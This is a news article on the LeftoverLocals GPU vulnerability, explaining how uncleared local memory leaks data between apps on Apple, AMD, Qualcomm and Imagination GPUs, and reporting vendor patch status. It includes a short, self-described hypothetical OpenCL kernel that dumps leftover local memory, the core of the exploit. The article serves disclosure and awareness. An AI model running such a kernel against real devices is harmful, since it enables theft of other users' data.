On-device AI can also pose a security risk

On-device artificial intelligence can also pose a security and privacy risk: in recent days, a team of researchers disclosed a flaw that, ironically, affects many devices from Apple, a company that leans heavily on user protection in both its features and its marketing.

The flaw has been dubbed LeftoverLocals, and it stems from the way GPUs handle the memory used for AI workloads. Data is written to a region called local memory, a fast scratch area shared by the threads of a GPU workgroup. On affected chips this region is not cleared between kernels, so an unauthorized process running on the same GPU can read the leftover data and extract it.
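The researchers' proof of concept boils down to a short "listener" kernel. A hypothetical sketch in OpenCL C is below; the kernel name, buffer size, and output layout are illustrative assumptions, not the actual exploit code:

```c
// Hypothetical LeftoverLocals-style "listener" kernel, sketched in OpenCL C.
// It declares local (workgroup) memory, never writes to it, and copies
// whatever stale values it finds into a host-visible buffer.
#define LM_WORDS 4096  // assumed local-memory capacity per workgroup, in floats

__kernel void dump_leftover_locals(__global float *out) {
    __local float lm[LM_WORDS];  // deliberately left uninitialized

    for (int i = get_local_id(0); i < LM_WORDS; i += get_local_size(0)) {
        // On a vulnerable GPU, lm[] still holds values written by a previous
        // kernel -- potentially another app's data -- which is exfiltrated here.
        out[get_group_id(0) * LM_WORDS + i] = lm[i];
    }
}
```

On a patched or unaffected GPU, the same kernel would only read zeroed or otherwise sanitized local memory; the vulnerability lies entirely in the driver/hardware failing to clear that region between kernels.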

According to the researchers, less than 10 lines of code are enough to steal between 5 and 100 MB of data per attack. The flaw is present in GPUs made by Apple, Imagination Technologies, AMD, and Qualcomm; GPUs from NVIDIA, Intel, and Arm are safe. The exploit can be executed by any other app installed on the device, as long as it is allowed to run code on the GPU. The attack surface, in short, is quite large and readily exploitable.

Apple said it has already released a corrective patch for its newer devices based on A17 Series and M3 Series chips, but there is no clear timeline for older ones. The researchers re-tested the attack a few days later: a third-generation iPad Air was no longer vulnerable, while an M2 MacBook Air still was.

AMD has indicated that the flaw cannot be fully corrected via software or firmware, but it is investigating possible mitigations. As for Imagination, it was Google that confirmed some of its GPUs are vulnerable; Imagination released a fix to its customers in December 2023, and those customers must in turn ship the patch to end devices, each on its own schedule. Qualcomm, finally, has released a corrective patch for at least some GPU models, though others may still be vulnerable.
